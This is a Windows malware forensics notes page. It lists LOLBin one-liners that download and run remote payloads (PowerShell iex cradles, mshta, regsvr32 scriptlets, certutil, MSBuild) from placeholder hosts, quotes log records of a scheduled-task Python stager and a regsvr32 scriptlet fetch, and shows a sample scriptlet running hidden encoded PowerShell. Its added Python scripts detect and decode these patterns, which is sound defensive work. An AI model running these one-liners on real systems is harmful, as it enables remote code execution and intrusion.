forensics-windows-malware.md

File metadata and controls

85 lines (58 loc) · 4.87 KB

Forensics miscellaneous

powershell malware

> powershell -c "anystring|iex"
> powershell -noP -sta -w 1 -enc base64string

Switch abbreviations seen in these command lines: -noP is -NoProfile, -sta is -Sta, -w 1 is -WindowStyle Hidden (1 is the Hidden value of the enum) and -enc is -EncodedCommand. The encoded string is base64 of the UTF-16LE script, so it has to be decoded as UTF-16LE, not UTF-8. powershell.exe accepts any unambiguous prefix of a parameter name, so the same command can appear under many spellings in logs.

executing web delivered malware

From arno0x0x's collection of Windows one-liners that download a remote payload and execute arbitrary code (`webserver` and `\\webdavserver\folder` are placeholders). Depending on the download method, artefacts may be left in the cache of the component that did the download: certutil -urlcache writes to the CryptnetUrlCache folder, urlmon-based fetches (mshta, regsvr32 with /i:http) land in the user's INetCache, and files pulled over a WebDAV UNC path are cached by the WebClient mini-redirector.

> powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
> powershell -exec bypass -f \\webdavserver\folder\payload.ps1

> cmd.exe /k < \\webdavserver\folder\batchfile.txt

> cscript //E:jscript \\webdavserver\folder\payload.txt

> mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
> mshta http://webserver/payload.hta
> mshta \\webdavserver\folder\payload.hta

> rundll32 \\webdavserver\folder\payload.dll,entrypoint
> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

> wmic os get /format:"https://webserver/payload.xsl"

> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

> regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
> regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

> odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

> cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

> certutil -urlcache -split -f http://webserver/payload payload
> certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
> certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
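As an added example (editor's code, not from arno0x0x's gist or this page), a small Python triage script that flags the one-liners above in process command lines and names the artefact to pull next. The artefact paths are well-known cache locations to be verified on the image at hand; the sample input is constructed from the commands listed above plus three benign look-alikes, so it runs offline.

```python
"""Flag the download-and-execute one-liners above in process command lines.

Added example (editor's code, not from arno0x0x's gist or this page). Each rule
pairs a case-insensitive regex for one LOLBin pattern with the artefact a
responder should pull next. SAMPLES is constructed from the commands listed
above plus three benign look-alikes.
"""
import re

# Well-known cache locations; starting points only, verify on the image.
WEBDAV_CACHE = r"WebDAV mini-redirector cache: %LOCALAPPDATA%\Temp\TfsStore\Tfs_DAV"
INETCACHE = r"urlmon/WinINet cache: %LOCALAPPDATA%\Microsoft\Windows\INetCache"
CRYPTNET = r"certutil cache: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache"
CMDLINE_ONLY = "no local cache known here; rely on the command line, proxy and DNS logs"

# (rule name, pattern, primary artefact). Patterns are searched case-insensitively.
RULES = [
    ("powershell_download_cradle",
     r"powershell.*?(?:\biwr\b|invoke-webrequest|downloadstring|downloadfile|net\.webclient|-enc)",
     "PowerShell script block log (event 4104); decode any -enc blob"),
    ("powershell_remote_file", r"powershell.*?\s-f(?:ile)?\s+\\\\", WEBDAV_CACHE),
    ("cmd_stdin_from_unc", r"cmd(?:\.exe)?\s+/k\s*<\s*\\\\", WEBDAV_CACHE),
    ("cscript_remote_jscript", r"cscript.*?//e:jscript\s+\\\\", WEBDAV_CACHE),
    ("mshta_remote", r"mshta\b.*?(?:https?://|\\\\)", INETCACHE),
    ("rundll32_remote", r"rundll32.*?(?:\\\\|https?://|javascript:)", INETCACHE),
    ("wmic_remote_xsl", r'wmic\b.*?/format:"?https?://', CMDLINE_ONLY),
    ("regasm_unc", r"regasm(?:\.exe)?\s+/u\s+\\\\", WEBDAV_CACHE),
    ("regsvr32_scriptlet", r"regsvr32.*?/i:(?:https?://|\\\\).*?scrobj\.dll", INETCACHE),
    ("odbcconf_regsvr_unc", r"odbcconf.*?\{regsvr\s+\\\\", WEBDAV_CACHE),
    ("msbuild_preprocess_unc", r"msbuild(?:\.exe)?.*?/preprocess\s+\\\\",
     "preprocessed project written to the cwd (note the '> payload.xml' redirect)"),
    ("certutil_urlcache", r"certutil\s+-urlcache", CRYPTNET + "; decoded file in the cwd"),
    ("installutil_uninstall", r"installutil(?:\.exe)?\s.*?/u\b", "DLL named on the command line"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE), hint) for name, pat, hint in RULES]

URL = re.compile(r"https?://[^\s\"')]+", re.IGNORECASE)
UNC = re.compile(r"\\\\[^\s\\\"']+\\[^\s\"']+")


def triage(cmdline):
    """Return the tripped rules, remote sources and artefacts, or None if clean."""
    hits = [(name, hint) for name, rx, hint in COMPILED if rx.search(cmdline)]
    if not hits:
        return None
    sources = URL.findall(cmdline) + UNC.findall(cmdline)
    artefacts = {hint for _, hint in hits}
    if any(src.startswith("\\\\") for src in sources):
        artefacts.add(WEBDAV_CACHE)  # anything fetched over a UNC path went through WebClient
    return {"rules": [name for name, _ in hits], "sources": sources,
            "artefacts": sorted(artefacts)}


def scan(cmdlines):
    """Run triage over many command lines, keeping only the hits."""
    results = []
    for cmd in cmdlines:
        hit = triage(cmd)
        if hit:
            results.append((cmd, hit))
    return results


# Constructed sample: the one-liners from the list above plus three benign look-alikes.
SAMPLES = [
    r'''powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"''',
    r"powershell -exec bypass -f \\webdavserver\folder\payload.ps1",
    r"cmd.exe /k < \\webdavserver\folder\batchfile.txt",
    r"cscript //E:jscript \\webdavserver\folder\payload.txt",
    r'mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))',
    r"mshta http://webserver/payload.hta",
    r"mshta \\webdavserver\folder\payload.hta",
    r"rundll32 \\webdavserver\folder\payload.dll,entrypoint",
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();',
    r'wmic os get /format:"https://webserver/payload.xsl"',
    r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll",
    r"regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll",
    r"regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll",
    r"odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}",
    r'cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"',
    r"certutil -urlcache -split -f http://webserver/payload payload",
    r"certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll",
    r"certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe",
    # benign look-alikes
    r"powershell -NoProfile -Command Get-Process",
    r"regsvr32 /s C:\Windows\System32\msxml3.dll",
    r"certutil -hashfile C:\Windows\notepad.exe SHA256",
]

if __name__ == "__main__":
    for cmd, hit in scan(SAMPLES):
        print(hit["rules"], hit["sources"])
        print("   ", cmd[:90])
```

The rules match on the binary plus a remote source, not on the binary alone, so ordinary regsvr32 or certutil use stays quiet; a real deployment would add the full-path variants (`C:\Windows\System32\...`) and the Sysmon or 4688 fields for parent process and user.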

Other

Malware can also be delivered through the virtualization platform. In the record below VMware Tools (vmtoolsd.exe, running as SYSTEM) spawns cmd.exe, which registers a one-shot scheduled task whose action is a Python download-and-exec stager, runs it, overwrites the task action with an innocuous string and then deletes the task. The temporary file name (powerclivmware...) suggests a guest operation issued via PowerCLI (Invoke-VMScript), i.e. the command arrived through the hypervisor management layer rather than over the guest's network; a.b.c.d is a placeholder address.

"25.04.2018 12:44:52","A new process has been created.","C:\Program Files\VMware\VMware Tools\vmtoolsd.exe","NT AUTHORITY\SYSTEM","0x15e8","C:\Windows\System32\cmd.exe","""cmd.exe"" /s /c cmd >C:\Users\PILOT~1.OPE\AppData\Local\Temp\powerclivmware177 2>&1 /s /c ""schtasks /create /sc once /tn 9dc3c659f9881e409bf1b5648bd1c3728a287e79 /tr ""python -c \""import urllib2; exec urllib2.urlopen(\\\""http://a.b.c.d:80/b\\\"").read();\"""" /st 13:00 /F & schtasks /run /tn 9dc3c659f9881e409bf1b5648bd1c3728a287e79 & ping 127.0.0.1 -n 6 > nul & schtasks /create /sc once /tn 9dc3c659f9881e409bf1b5648bd1c3728a287e79 /tr "" - MGMT STUFF - "" /st 13:00 /F & schtasks /delete /tn 9dc3c659f9881e409bf1b5648bd1c3728a287e79 /F"""

RuntimeBroker.exe

A standard Windows 10 component tied to the modern (Metro?) UI and the Store. The documentation states that it controls the permissions of Store apps, but it also executes commands and programs when a program name or full path (e.g. powershell.exe) is typed into the Start search box. On search-and-click the program is spawned by explorer.exe, but on Enter it is spawned by RuntimeBroker.exe. Any invocation of Microsoft Edge is also handled by RuntimeBroker.exe. There is probably a way to hook a startup app into the broker ...

The records below show the sequence: an interactive logon (rdpclip.exe, AtBroker.exe, LogonUI.exe), RuntimeBroker.exe activated out-of-process (-Embedding) by svchost.exe, and three seconds later RuntimeBroker.exe spawning regsvr32.exe under the user account with a remote scriptlet URL.

"26.04.2018 11:25:50","A new process has been created.","C:\Windows\System32\svchost.exe","NT AUTHORITY\NETWORK SERVICE","0x1b1c","C:\Windows\System32\rdpclip.exe","rdpclip"
"26.04.2018 11:25:50","A new process has been created.","C:\Windows\System32\winlogon.exe","NT AUTHORITY\SYSTEM","0x1c34","C:\Windows\System32\AtBroker.exe","atbroker.exe"
"26.04.2018 11:25:50","A new process has been created.","C:\Windows\System32\winlogon.exe","NT AUTHORITY\SYSTEM","0x276c","C:\Windows\System32\LogonUI.exe","""LogonUI.exe"" /flags:0x0 /state0:0xa1e48055 /state1:0x41c64e6d"
...
"26.04.2018 11:26:00","A new process has been created.","C:\Windows\System32\svchost.exe","NT AUTHORITY\SYSTEM","0x1988","C:\Windows\System32\RuntimeBroker.exe","C:\Windows\System32\RuntimeBroker.exe -Embedding"
"26.04.2018 11:26:03","A new process has been created.","C:\Windows\System32\RuntimeBroker.exe","BACKUPPILOT\pilot.operator","0x25f0","C:\Windows\System32\regsvr32.exe","""C:\Windows\System32\regsvr32.exe"" /u /n /s /i:http://domainx/g.html scrObj.dll"
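To turn records like these into a parent/child check, an added Python example (editor's code, not from the page) that parses this export format and flags interpreters spawned by vmtoolsd.exe or RuntimeBroker.exe. The sample log is a constructed copy of the records shown in this section and of the vmtoolsd.exe record in the section above, with the ordinary logon records kept as negatives.

```python
"""Parse exported 4688 'A new process has been created' records and flag odd parents.

Added example (editor's code, not from the page). SAMPLE_LOG is a constructed
copy of the CSV records shown above. Field order follows those records:
time, message, creator image, account, new PID (hex), new image, command line.
"""
import csv
import io
import ntpath

FIELDS = ("time", "message", "parent_image", "account", "new_pid", "new_image", "cmdline")

# Parents seen on this page that should not be launching interpreters or LOLBins.
SUSPICIOUS_PARENTS = {"runtimebroker.exe", "vmtoolsd.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "schtasks.exe", "certutil.exe", "msbuild.exe"}

SAMPLE_LOG = r'''
"25.04.2018 12:44:52","A new process has been created.","C:\Program Files\VMware\VMware Tools\vmtoolsd.exe","NT AUTHORITY\SYSTEM","0x15e8","C:\Windows\System32\cmd.exe","""cmd.exe"" /s /c cmd >C:\Users\PILOT~1.OPE\AppData\Local\Temp\powerclivmware177 2>&1 /s /c ""schtasks /create /sc once /tn 9dc3c659f9881e409bf1b5648bd1c3728a287e79 /tr ""python -c \""import urllib2; exec urllib2.urlopen(\\\""http://a.b.c.d:80/b\\\"").read();\"""" /st 13:00 /F & schtasks /run /tn 9dc3c659f9881e409bf1b5648bd1c3728a287e79 & ping 127.0.0.1 -n 6 > nul & schtasks /create /sc once /tn 9dc3c659f9881e409bf1b5648bd1c3728a287e79 /tr "" - MGMT STUFF - "" /st 13:00 /F & schtasks /delete /tn 9dc3c659f9881e409bf1b5648bd1c3728a287e79 /F"""
"26.04.2018 11:25:50","A new process has been created.","C:\Windows\System32\svchost.exe","NT AUTHORITY\NETWORK SERVICE","0x1b1c","C:\Windows\System32\rdpclip.exe","rdpclip"
"26.04.2018 11:25:50","A new process has been created.","C:\Windows\System32\winlogon.exe","NT AUTHORITY\SYSTEM","0x1c34","C:\Windows\System32\AtBroker.exe","atbroker.exe"
"26.04.2018 11:25:50","A new process has been created.","C:\Windows\System32\winlogon.exe","NT AUTHORITY\SYSTEM","0x276c","C:\Windows\System32\LogonUI.exe","""LogonUI.exe"" /flags:0x0 /state0:0xa1e48055 /state1:0x41c64e6d"
"26.04.2018 11:26:00","A new process has been created.","C:\Windows\System32\svchost.exe","NT AUTHORITY\SYSTEM","0x1988","C:\Windows\System32\RuntimeBroker.exe","C:\Windows\System32\RuntimeBroker.exe -Embedding"
"26.04.2018 11:26:03","A new process has been created.","C:\Windows\System32\RuntimeBroker.exe","BACKUPPILOT\pilot.operator","0x25f0","C:\Windows\System32\regsvr32.exe","""C:\Windows\System32\regsvr32.exe"" /u /n /s /i:http://domainx/g.html scrObj.dll"
'''


def parse_records(text):
    """CSV-parse the export; doubled quotes inside the command line are unescaped by csv."""
    records = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) != len(FIELDS):
            continue  # blank lines and truncated rows
        records.append(dict(zip(FIELDS, row)))
    return records


def flag_lineage(records):
    """Return records where a broker or agent process spawned an interpreter or LOLBin."""
    flagged = []
    for r in records:
        parent = ntpath.basename(r["parent_image"]).lower()
        child = ntpath.basename(r["new_image"]).lower()
        if parent in SUSPICIOUS_PARENTS and child in INTERPRETERS:
            flagged.append({"time": r["time"], "parent": parent, "child": child,
                            "account": r["account"], "pid": int(r["new_pid"], 16),
                            "cmdline": r["cmdline"]})
    return flagged


if __name__ == "__main__":
    for f in flag_lineage(parse_records(SAMPLE_LOG)):
        print(f["time"], f["parent"], "->", f["child"], "as", f["account"], "pid", f["pid"])
        print("   ", f["cmdline"][:100])
```

The lineage check is deliberately narrow (two parents observed on this page); in practice the parent list is the thing to grow, and the command line of each hit is then handed to the one-liner rules from the previous section.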

regsvr32 download scriptlet

> C:\Windows\system32\regsvr32.exe /u /n /s /i:http://domain/g.html scrObj.dll

/s is silent, /n skips DllRegisterServer, /u selects the uninstall path and /i:<url> passes the URL to DllInstall of scrobj.dll, which fetches the file and runs it as a scriptlet. The script inside the registration block runs as soon as the scriptlet is loaded, so the declared Exec method is never called. An example of such a scriptlet (the encoded command is truncated):

```xml
<?XML version="1.0"?>
<scriptlet>
  <registration description="Win32COMDebug" progid="Win32COMDebug" version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}">
    <script language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run('powershell -noP -sta -w 1 -enc SQBmACgAJABQ...');
    ]]>
    </script>
  </registration>
  <public><method name="Exec"></method></public>
</scriptlet>
```
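Added example (editor's code, not the page's): triage of a scriptlet like the one above, extracting the registration identifiers and the Run() command, expanding the abbreviated powershell.exe switches from the "powershell malware" section, and decoding the -enc payload as UTF-16LE. The scriptlet and the encoded blob are constructed here, since the page's blob is truncated; the only URL used is the http://webserver/payload.ps1 placeholder from the one-liner list.

```python
"""Triage a regsvr32 scriptlet: registration ids, Run() command, decoded -enc payload.

Added example (editor's code, not from the page). SAMPLE_SCT is a constructed
copy of the scriptlet above whose truncated encoded command is replaced by one
generated here from a download cradle using the page's placeholder URL.
"""
import base64
import re

# powershell.exe accepts any unambiguous prefix of these parameter names ...
CANONICAL = ["NoProfile", "NonInteractive", "NoLogo", "NoExit", "Sta", "WindowStyle",
             "EncodedCommand", "Command", "ExecutionPolicy", "File"]
# ... plus a few documented short forms that are not unique prefixes.
SPECIAL = {"e": "EncodedCommand", "ec": "EncodedCommand", "ep": "ExecutionPolicy"}

INDICATORS = {
    "iex": r"\biex\b|invoke-expression",
    "download": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient",
    "hidden_window": r"-windowstyle\s+(?:1|hidden)\b",
    "no_profile": r"-noprofile\b",
    "encoded": r"-encodedcommand\b",
    "policy_bypass": r"-executionpolicy\s+bypass\b",
}

# Regex rather than an XML parser: malicious scriptlets are rarely well-formed.
SCRIPT_RE = re.compile(r'<script\s+language\s*=\s*"([^"]+)"\s*>\s*(?:<!\[CDATA\[)?(.*?)(?:\]\]>)?\s*</script>',
                       re.I | re.S)
RUN_RE = re.compile(r"""\.Run\(\s*(['"])(.*?)\1""", re.S)

SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://webserver/payload.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_SCT = (
    '<?XML version="1.0"?>\n<scriptlet>\n'
    '<registration description="Win32COMDebug" progid="Win32COMDebug" version="1.00" '
    'classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}">\n'
    '<script language="JScript">\n<![CDATA[\n'
    "var r = new ActiveXObject(\"WScript.Shell\").Run('powershell -noP -sta -w 1 -enc "
    + SAMPLE_ENCODED + "');\n]]>\n</script>\n</registration>\n"
    '<public><method name="Exec"></method></public>\n</scriptlet>\n'
)


def expand_param(token):
    """Map an abbreviated switch such as -noP or -w to its full name; None if not a switch."""
    if not token.startswith("-"):
        return None
    name = token[1:].lower()
    if name in SPECIAL:
        return SPECIAL[name]
    matches = [c for c in CANONICAL if c.lower().startswith(name)]
    return matches[0] if name and len(matches) == 1 else None


def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of the UTF-16LE script, not UTF-8."""
    return base64.b64decode(blob).decode("utf-16-le")


def triage_powershell(cmdline):
    """Normalise switches, recover the script (-enc or -c) and list indicators."""
    tokens = cmdline.split()
    normalized, script, i = [], None, 0
    while i < len(tokens):
        full = expand_param(tokens[i])
        if full == "EncodedCommand" and i + 1 < len(tokens):
            script = decode_encoded_command(tokens[i + 1])
            normalized.append("-EncodedCommand <decoded>")
            i += 2
        elif full == "Command":
            script = " ".join(tokens[i + 1:]).strip('"')  # rest of the line is the script
            normalized.append("-Command")
            break
        else:
            normalized.append("-" + full if full else tokens[i])
            i += 1
    haystack = " ".join(normalized) + " " + (script or "")
    indicators = sorted(n for n, rx in INDICATORS.items() if re.search(rx, haystack, re.I))
    return {"normalized": " ".join(normalized), "script": script, "indicators": indicators}


def triage_scriptlet(text):
    """Pull progid/classid, every script block and any PowerShell command it runs."""
    attrs = {}
    reg = re.search(r"<registration\b([^>]*)>", text, re.I)
    if reg:
        attrs = {k.lower(): v for k, v in re.findall(r'(\w+)="([^"]*)"', reg.group(1))}
    scripts = []
    for language, body in SCRIPT_RE.findall(text):
        commands = [m.group(2) for m in RUN_RE.finditer(body)]
        scripts.append({"language": language, "run": commands,
                        "powershell": [triage_powershell(c) for c in commands
                                       if c.lstrip().lower().startswith("powershell")]})
    return {"progid": attrs.get("progid"), "classid": attrs.get("classid"), "scripts": scripts}


if __name__ == "__main__":
    result = triage_scriptlet(SAMPLE_SCT)
    print(result["progid"], result["classid"])
    for ps in result["scripts"][0]["powershell"]:
        print(ps["normalized"], "|", ps["script"], "|", ps["indicators"])
```

The classid and progid are worth keeping as indicators of their own: a scriptlet that is reused across victims tends to keep them, and the classid can be searched for in HKCU\Software\Classes on hosts where it was registered.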